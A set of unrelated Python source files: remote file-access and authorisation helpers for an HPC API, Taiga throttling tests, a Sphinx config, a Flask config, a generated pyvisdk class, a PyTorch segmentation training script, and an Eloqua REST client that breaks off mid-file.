# function to check task status:
def get_task_status(task_id, headers):
logging.info(f"{TASKS_URL}/{task_id}")
try:
retval = requests.get(f"{TASKS_URL}/{task_id}",
headers=headers, verify=(SSL_CRT if USE_SSL else False))
if retval.status_code != 200:
return -1
data = retval.json()
logging.info(data["task"]["status"])
return data["task"]["status"]
except Exception as e:
logging.error(type(e), exc_info=True)
logging.error(e)
return -1
# checks if {path} is a valid file (exists and user in {auth_header} has read permissions)
def is_valid_file(path, headers, system_name, system_addr):
ID = headers.get(TRACER_HEADER, '')
# checks user accessibility to path using head command with 0 bytes
action = f"ID={ID} head -c 1 -- '{path}' > /dev/null"
retval = exec_remote_command(headers, system_name, system_addr, action)
logging.info(retval)
if retval["error"] != 0:
error_str=retval["msg"]
if retval["error"] == 113:
return {"result":False, "headers":{"X-Machine-Not-Available":"Machine is not available"} }
if retval["error"] == 124:
return {"result":False, "headers":{"X-Timeout": "Command has finished with timeout signal"}}
# error no such file
if in_str(error_str,"No such file"):
return {"result":False, "headers":{"X-Invalid-Path": f"{path} is an invalid path."}}
# permission denied
if in_str(error_str,"Permission denied") or in_str(error_str,"OPENSSH"):
return {"result":False, "headers":{"X-Permission-Denied": "User does not have permissions to access machine or path"}}
if in_str(error_str, "directory"):
return {"result":False, "headers":{"X-A-Directory": f"{path} is a directory"}}
return {"result":False, "headers":{"X-Error": retval["msg"]}}
return {"result":True}
# checks if {path} is a valid directory
# 'path' should exists and be accesible to the user (write permissions)
#
def is_valid_dir(path, headers, system_name, system_addr):
# create an empty file for testing path accesibility
# test file is a hidden file and has a timestamp in order to not overwrite other files created by user
# after this, file should be deleted
timestamp = datetime.datetime.today().strftime("%Y-%m-%dT%H:%M:%S.%f")
# using a hash
hashedTS = hashlib.md5()
hashedTS.update(timestamp.encode("utf-8"))
tempFileName = f".firecrest.{hashedTS.hexdigest()}"
ID = headers.get(TRACER_HEADER, '')
action = f"ID={ID} touch -- '{path}/{tempFileName}'"
retval = exec_remote_command(headers, system_name, system_addr, action)
logging.info(retval)
if retval["error"] != 0:
error_str=retval["msg"]
if retval["error"] == 113:
return {"result":False, "headers":{"X-Machine-Not-Available":"Machine is not available"} }
if retval["error"] == 124:
return {"result":False, "headers":{"X-Timeout": "Command has finished with timeout signal"}}
# error no such file
if in_str(error_str,"No such file"):
return {"result":False, "headers":{"X-Invalid-Path": f"{path} is an invalid path."}}
# permission denied
if in_str(error_str,"Permission denied") or in_str(error_str,"OPENSSH"):
return {"result":False, "headers":{"X-Permission-Denied": "User does not have permissions to access machine or path"}}
# not a directory
if in_str(error_str,"Not a directory"):
return {"result":False, "headers":{"X-Not-A-Directory": f"{path} is not a directory"}}
return {"result":False, "headers":{"X-Error": retval["msg"]}}
# delete test file created
action = f"ID={ID} rm -- '{path}/{tempFileName}'"
retval = exec_remote_command(headers, system_name, system_addr, action)
return {"result":True}
# wrapper to check if AUTH header is correct
# decorator use:
#
# @app.route("/endpoint", methods=["GET","..."])
# @check_auth_header
# def function_that_check_header():
# .....
def check_auth_header(func):
@functools.wraps(func)
def wrapper_check_auth_header(*args, **kwargs):
try:
auth_header = request.headers[AUTH_HEADER_NAME]
except KeyError:
logging.error("No Auth Header given")
return jsonify(description="No Auth Header given"), 401
if not check_header(auth_header):
return jsonify(description="Invalid header"), 401
return func(*args, **kwargs)
return wrapper_check_auth_header
# check user authorization on endpoint
# using Open Policy Agent
#
# use:
# check_user_auth(username,system)
def check_user_auth(username,system):
# check if OPA is active
if OPA_USE:
try:
input = {"input":{"user": f"{username}", "system": f"{system}"}}
if debug:
logging.info(f"OPA: enabled, using {OPA_URL}/{POLICY_PATH}")
resp_opa = requests.post(f"{OPA_URL}/{POLICY_PATH}", json=input)
logging.info(resp_opa.content)
if resp_opa.json()["result"]["allow"]:
logging.info(f"User {username} authorized by OPA")
return {"allow": True, "description":f"User {username} authorized", "status_code": 200 }
else:
logging.error(f"User {username} NOT authorized by OPA")
return {"allow": False, "description":f"User {username} not authorized in {system}", "status_code": 401}
except requests.exceptions.RequestException as e:
logging.error(e.args)
return {"allow": False, "description":"Authorization server error", "status_code": 404}
return {"allow": True, "description":"Authorization method not active", "status_code": 200 }
# Checks each paramiko command output on a error execution
# error_str: strerr (or strout) of the command
# error_code: errno of the command
# service_msg: service output in the "description" json response
def check_command_error(error_str, error_code, service_msg):
if error_code == -2:
header = {"X-Machine-Not-Available": "Machine is not available"}
return {"description": service_msg, "status_code": 400, "header": header}
if error_code == 113:
header = {"X-Machine-Not-Available":"Machine is not available"}
return {"description": service_msg, "status_code": 400, "header": header}
if error_code == 124:
header = {"X-Timeout": "Command has finished with timeout signal"}
return {"description": service_msg, "status_code": 400, "header": header}
if error_code == 118:
header = {"X-Error": "Command execution is not allowed in machine"}
return {"description": service_msg, "status_code": 400, "header": header}
# When certificate doesn't match SSH configuration
if in_str(error_str,"OPENSSH"):
header = {"X-Permission-Denied": "User does not have permissions to access machine"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"cannot access"):
header={"X-Invalid-Path":"path is an invalid path"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"No such file"):
if in_str(error_str,"cannot stat"):
header={"X-Not-Found":"sourcePath not found"}
return {"description": service_msg, "status_code": 400, "header": header}
# copy: cannot create, rename: cannot move
if in_str(error_str, "cannot create") or in_str(error_str,"cannot move"):
header = {"X-Invalid-Path": "sourcePath and/or targetPath are invalid paths"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"cannot remove"):
header = {"X-Invalid-Path": "path is an invalid path."}
return {"description": service_msg, "status_code": 400, "header": header}
header={"X-Invalid-Path":"path is an invalid path"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"cannot open"):
header = {"X-Permission-Denied": "User does not have permissions to access path"}
return {"description":service_msg, "status_code": 400, "header": header}
if in_str(error_str,"Permission denied"):
header = {"X-Permission-Denied": "User does not have permissions to access path"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"directory"):
header = {"X-A-Directory": "path is a directory, can't checksum directories"}
return {"description": service_msg, "status_code": 400, "header": header}
# if already exists, not overwrite (-i)
if in_str(error_str,"overwrite"):
header = {"X-Exists": "targetPath already exists"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"not permitted"):
header = {"X-Permission-Denied": "User does not have permissions to access path"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"invalid group"):
header = {"X-Invalid-Group": "group is an invalid group"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str,"invalid user"):
header = {"X-Invalid-Owner": "owner is an invalid user"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str, "invalid mode"):
header = {"X-Invalid-Mode": "mode is an invalid mode"}
return {"description": service_msg, "status_code": 400, "header": header}
if in_str(error_str, "read permission"):
header = {"X-Permission-Denied": "User does not have permissions to access path"}
return {"description": service_msg, "status_code": 400, "header": header}
header = {"X-Error": error_str}
return {"description": service_msg, "error": error_str, "status_code": 400, "header": header}
## Test if user provided text is not empty and has no invalid chars
def validate_input(text):
if text == None:
return "not specified"
if text == "":
return "is empty"
if re.search(FORBIDDEN_INPUT_CHARS, text) != None:
logging.warning(f'Forbidden char on: {base64.urlsafe_b64encode(text.encode()).decode()}')
return "has invalid char"
return ""
# formatter is executed for every log
class LogRequestFormatter(logging.Formatter):
def format(self, record):
try:
# try to get TID from Flask g object, it's set on @app.before_request on each microservice
record.TID = g.TID
except:
try:
record.TID = threading.current_thread().name
except:
record.TID = 'notid'
return super().format(record)
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2017 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2017 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2017 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.test import RequestFactory
from django.core.cache import cache
from django.contrib.auth.models import AnonymousUser
from taiga.base.throttling import CommonThrottle
from taiga.users.models import User
def test_user_no_write_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
request = rf.post("/test")
request.user = User(id=1)
throttling = CommonThrottle()
for x in range(100):
assert throttling.allow_request(request, None)
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_simple_write_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = "1/min"
request = rf.post("/test")
request.user = User(id=1)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_multi_write_first_small_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = ["1/min", "10/min"]
request = rf.post("/test")
request.user = User(id=1)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_multi_write_first_big_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = ["10/min", "1/min"]
request = rf.post("/test")
request.user = User(id=1)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_no_read_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
request = rf.get("/test")
request.user = User(id=1)
throttling = CommonThrottle()
for x in range(100):
assert throttling.allow_request(request, None)
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_user_simple_read_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = "1/min"
request = rf.get("/test")
request.user = User(id=1)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_user_multi_read_first_small_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = ["1/min", "10/min"]
request = rf.get("/test")
request.user = User(id=1)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_user_multi_read_first_big_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = ["10/min", "1/min"]
request = rf.get("/test")
request.user = User(id=1)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_whitelisted_user_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = "1/min"
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = [1]
request = rf.get("/test")
request.user = User(id=1)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None)
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_not_whitelisted_user_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = "1/min"
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = [1]
request = rf.get("/test")
request.user = User(id=2)
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_anon_no_write_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
request = rf.post("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
for x in range(100):
assert throttling.allow_request(request, None)
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_simple_write_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = "1/min"
request = rf.post("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_multi_write_first_small_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = ["1/min", "10/min"]
request = rf.post("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_multi_write_first_big_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = ["10/min", "1/min"]
request = rf.post("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_no_read_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
request = rf.get("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
for x in range(100):
assert throttling.allow_request(request, None)
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_anon_simple_read_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
request = rf.get("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_anon_multi_read_first_small_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = ["1/min", "10/min"]
request = rf.get("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_anon_multi_read_first_big_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = ["10/min", "1/min"]
request = rf.get("/test")
request.user = AnonymousUser()
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_whitelisted_anon_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["127.0.0.1"]
request = rf.get("/test")
request.user = AnonymousUser()
request.META["REMOTE_ADDR"] = "127.0.0.1"
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None)
for x in range(100):
assert throttling.allow_request(request, None)
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_not_whitelisted_anon_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["127.0.0.1"]
request = rf.get("/test")
request.user = AnonymousUser()
request.META["REMOTE_ADDR"] = "127.0.0.2"
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_whitelisted_subnet_anon_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["192.168.0.0/24"]
request = rf.get("/test")
request.user = AnonymousUser()
request.META["REMOTE_ADDR"] = "192.168.0.123"
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None)
for x in range(100):
assert throttling.allow_request(request, None)
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_not_whitelisted_subnet_anon_throttling(settings, rf):
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["192.168.0.0/24"]
request = rf.get("/test")
request.user = AnonymousUser()
request.META["REMOTE_ADDR"] = "192.168.1.123"
throttling = CommonThrottle()
assert throttling.allow_request(request, None)
assert throttling.allow_request(request, None) is False
for x in range(100):
assert throttling.allow_request(request, None) is False
cache.clear()
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# -- Project information -----------------------------------------------------
project = 'pipcs'
copyright = '2021, Göktuğ Karakaşlı'
author = 'Göktuğ Karakaşlı'
# -- General configuration ---------------------------------------------------
import sphinx_rtd_theme
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx_rtd_theme',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.coverage',
'sphinx.ext.napoleon',
'sphinx.ext.viewcode'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'build', 'dist', '*.egg-info']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
master_doc = 'index'
|
class Config:
'''
General configuration parent class
'''
MOVIE_API_BASE_URL = 'https://api.themoviedb.org/3/movie/{}?api_key={}'
class ProdConfig(Config):
'''
Production configuration child class
Args:
Config: The parent configuration class with General configuration settings
'''
pass
class DevConfig(Config):
'''
Development configuration child class
Args:
Config: The parent configuration class with General configuration settings
'''
DEBUG = True
|
from pyvisdk.base.managed_object_types import ManagedObjectTypes
from pyvisdk.base.base_entity import BaseEntity
import logging
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
class LocalizationManager(BaseEntity):
'''This managed object type presents all the message catalogs for client-side
localization of messages.'''
def __init__(self, core, name=None, ref=None, type=ManagedObjectTypes.LocalizationManager):
super(LocalizationManager, self).__init__(core, name=name, ref=ref, type=type)
@property
def catalog(self):
'''Fetches the descriptions of all the client-side localization message catalogs
available for the current session locale.'''
return self.update('catalog')
|
import os
import time
import torch
import numpy as np
import torch.nn as nn
import cv2
from torchinfo import summary
from torch.utils.data import DataLoader
import source.logger as logger
from source.model import FusionNet, UNet
from source.dataset.dataset import NucleiCellDataset
import source.utils as utils
import source.arguments as arguments
def main(m_args):
# Name model
model_name = utils.get_model_name(m_args)
# Tensorboard
logger_tb = logger.Logger(log_dir=model_name)
# Get dataset
train_dataset = NucleiCellDataset(m_args.train_data,
phase="train",
transform=m_args.transform,
image_size=m_args.image_size)
validation_dataset = NucleiCellDataset(m_args.train_data,
phase="validation",
transform=m_args.transform,
image_size=m_args.image_size)
# Create dataloader
train_dataloader = DataLoader(train_dataset,
batch_size=m_args.batch_size,
shuffle=True,
num_workers=m_args.num_workers,
pin_memory=True)
val_dataloader = DataLoader(validation_dataset,
batch_size=m_args.batch_size,
shuffle=False,
num_workers=m_args.num_workers,
pin_memory=True)
# Device
device = torch.device("cuda:" + m_args.gpu_ids) \
if torch.cuda.is_available() else "cpu"
# Model
if m_args.model == "fusion":
model = FusionNet(m_args, train_dataset.dim)
else:
model = UNet(m_args.num_kernel, m_args.kernel_size, train_dataset.dim,
train_dataset.target_dim)
summary(model)
print(list(model.parameters())[0].shape)
print("total number of training examples", str(len(train_dataset)))
print("total number of validation examples", str(len(validation_dataset)))
print("length of train data loader", str(len(train_dataloader)))
print("length of validation data loader", str(len(val_dataloader)))
model = model.to(device)
dataiter = iter(train_dataloader)
imgs, _, _ = dataiter.next()
imgs = imgs.float().to(device)
print(imgs.shape)
# logger_tb.update_graph(model, imgs)
# Optimizer
parameters = model.parameters()
if m_args.optimizer == "adam":
optimizer = torch.optim.Adam(parameters, m_args.lr)
else:
optimizer = torch.optim.SGD(parameters, m_args.lr)
# Loss
criterion = nn.CrossEntropyLoss()
criterion = criterion.to(device)
count = 0
try:
cp_p = os.path.join("output/", m_args.experiment_name,
model_name + ".pth.tar")
count = utils.load_checkpoint(torch.load(cp_p), model, optimizer)
print("Train from a previous checkpoint...")
except FileNotFoundError:
print("No checkpoint found, start training from step 0...")
pass
# Train model
model.train()
best_valid_loss = float("Inf")
total_time_min, total_time_sec = 0.0, 0.0
global_steps_list = []
for epoch in range(m_args.epoch):
start_time = time.time()
total_loss = []
for i, (x_train, y_nuclei, y_cell) in enumerate(train_dataloader):
optimizer.zero_grad()
if m_args.target_type == "nuclei":
y_train = y_nuclei
else:
y_train = y_cell
# Send data and label to device
x = x_train.to(device)
# Input should be between 0 and 1
x = torch.div(x, 255)
y = y_train.to(device)
# Predict segmentation
pred = model(x).squeeze(1)
# Calculate loss
loss = criterion(pred, y.long())
total_loss.append(loss.item())
# Get the class with the highest probability
_, pred = torch.max(pred, dim=1)
# Back prop
loss.backward()
optimizer.step()
# Log loss, dice and iou
avg_loss = np.mean(total_loss)
count += 1
logger_tb.update_value("steps vs train loss", avg_loss, count)
global_steps_list.append(count)
# Display segmentation on tensorboard
if i == 0:
original = x_train[i].detach().cpu().numpy()
truth = y[i].squeeze().detach().cpu().numpy()
seg = pred[i].squeeze().detach().cpu().numpy()
logger_tb.update_image("original", original, count)
seg = cv2.normalize(seg, None, alpha=0, beta=255,
norm_type=cv2.NORM_MINMAX)
seg = np.expand_dims(seg, axis=0)
seg = seg.astype(np.uint8)
logger_tb.update_image("segmentation", seg, count)
truth = cv2.normalize(truth, None, alpha=0, beta=255,
norm_type=cv2.NORM_MINMAX)
truth = np.expand_dims(truth, axis=0)
truth = truth.astype(np.uint8)
logger_tb.update_image("truth", truth, count)
if count % 5 == 0:
avg_loss_val, dice, valid_loss = validate(m_args, criterion,
device, model,
val_dataloader)
print("Epoch [{}/{}], Step [{}/{}] || "
"Train Loss: {:.4f}, Valid Loss: {:.4f}"
.format(epoch + 1, m_args.epoch, count,
m_args.epoch * len(train_dataloader),
avg_loss, avg_loss_val))
logger_tb.update_value("steps vs validation loss",
avg_loss_val,
count)
logger_tb.update_value("steps vs validation dice",
dice,
count)
if best_valid_loss > avg_loss_val:
best_valid_loss = avg_loss_val
utils.create_checkpoint(model_name,
count,
global_steps_list,
model,
optimizer,
total_loss,
valid_loss,
m_args.experiment_name)
model.train()
ep_loss_val, epoch_dice, epoch_val_loss = validate(m_args,
criterion,
device,
model,
val_dataloader)
end_time = time.time()
epoch_mins, epoch_secs = utils.epoch_time(start_time, end_time)
total_time_min += epoch_mins
total_time_sec += epoch_secs
logger_tb.update_value("epoch vs validation loss", ep_loss_val, epoch)
logger_tb.update_value("epoch vs validation dice", epoch_dice, epoch)
logger_tb.update_value("epoch vs time", total_time_min, epoch)
logger_tb.update_value("steps vs time", total_time_min, count)
def validate(v_args, criterion, device, model, validation_dataloader):
model.eval()
valid_loss = []
intersections, totals = 0, 0
with torch.no_grad():
for i_val, (x_val, y_nuclei_val, y_cell_val) in enumerate(
validation_dataloader):
if v_args.target_type == "nuclei":
y_train = y_nuclei_val
else:
y_train = y_cell_val
# Send data and label to device
x = x_val.to(device)
# Input should be between 0 and 1
x = torch.div(x, 255)
y = y_train.to(device)
# Predict segmentation
pred = model(x).squeeze(1)
# Calculate loss
loss = criterion(pred, y.long())
# Get the class with the highest probability
_, pred = torch.max(pred, dim=1)
inputs = pred.view(-1)
targets = y.view(-1)
intersection = (inputs * targets).sum()
total = inputs.sum() + targets.sum()
# intersection is equivalent to True Positive count
intersections += intersection
# union is the mutually inclusive area of all labels & predictions
totals += total
valid_loss.append(loss.item())
dice = (2. * intersections) / totals
avg_loss_val = np.mean(valid_loss)
return avg_loss_val, dice, valid_loss
if __name__ == "__main__":
args = arguments.get_arguments()
main(args)
|
#!/usr/bin/python
# ElqRest functions by Greg Bernard
import datetime
import requests
import config
import sqlite3
import time
import TableNames
API_VERSION = '2.0' # Change to use a different API version
POST_HEADERS = {'Content-Type': 'application/json'}
class ElqRest(object):
def __init__(self, sync=None, company=config.company, username=config.username,
password=config.password, filename='EloquaDB.db'):
"""
:param string sync: Eloqua object to sync to database,
if you provide a value all relevant methods will automatically be called
current support: campaigns, campaign, external
:param string username: Eloqua username
:param string password: Eloqua password
:param string company: Eloqua company instance
:param string filename: Name of database file
"""
url = 'https://login.eloqua.com/id'
req = requests.get(url, auth=(company + '\\' + username,
password))
self.sync = sync
self.filename = filename
print("-"*50)
print("Beginning {} sync.".format(sync))
if all(arg is not None for arg in (username, password, company)):
if req.json() == 'Not authenticated.':
raise ValueError('Invalid login credentials')
else:
self.username = username
self.password = password
self.company = company
self.auth = (company + '\\' + username, password)
self.user_id = req.json()['user']['id']
self.user_display = req.json()['user']['displayName']
self.url_base = req.json()['urls']['base']
self.site_id = req.json()['site']['id']
self.rest_bs_un = req.json()['urls']['apis'][
'rest']['standard']
self.rest_base = self.rest_bs_un.format(
version=API_VERSION)
else:
raise Exception(
'Please enter all required login details: company, username, password')
self.db = sqlite3.connect(self.filename, detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
self.c = self.db.cursor()
# BASE GET METHOD ----------------------------------------------------------------------------------------
def get(self, asset_id=None, count=500, page=1):
"""
Get REST API 2.0 data from Eloqua
:param asset_id: If your asset is meant to only pull one at a time,
provide the ID for the asset you wish to pull
:param count: If your asset is pulled in batches, the size of the batch
:param page: The page you wish to pull, size of the page is determined by your batch size
:return: The requested data
"""
depth = ""
multi_assets = ['campaigns', 'users']
if self.sync == 'external':
asset_type = 'data/activity/'
elif self.sync == 'campaigns':
asset_type = 'assets/campaigns'
depth = 'depth=partial&'
elif self.sync == 'campaign':
asset_type = 'assets/campaign/'
elif self.sync == 'users':
asset_type = 'system/users'
depth = 'depth=complete'
self.rest_base = self.rest_bs_un.format(
version='1.0')
# print(self.rest_base)
else:
raise Exception(
"Please enter an accepted REST input: external, campaign, campaigns, users")
if count is None:
count_item = ""
elif (count is not None) and (self.sync not in multi_assets):
# print("{} does not accept the input count, removing.".format(asset))
count_item = ""
else:
count_item = "count={}&".format(count)
if page is None:
page_item = ""
elif (page is not None) and (self.sync not in multi_assets):
# print("{} does not accept the input page, removing.".format(asset))
page_item = ""
else:
page_item = "page={}&".format(page)
if (self.sync not in multi_assets) and (asset_id is not None):
asset_id = asset_id
else:
asset_id = "?"
url = self.rest_base + str(asset_type) + \
str(asset_id) + page_item + count_item + depth
# print(url)
req = requests.get(url, auth=self.auth)
if req.status_code == 200:
return req.json()
else:
print("Error Code: {}".format(req.status_code))
return None
# GET SPECIFIC DATA FROM REST ---------------------------------------------------------------------------
def get_activities(self, start=1, end=999999):
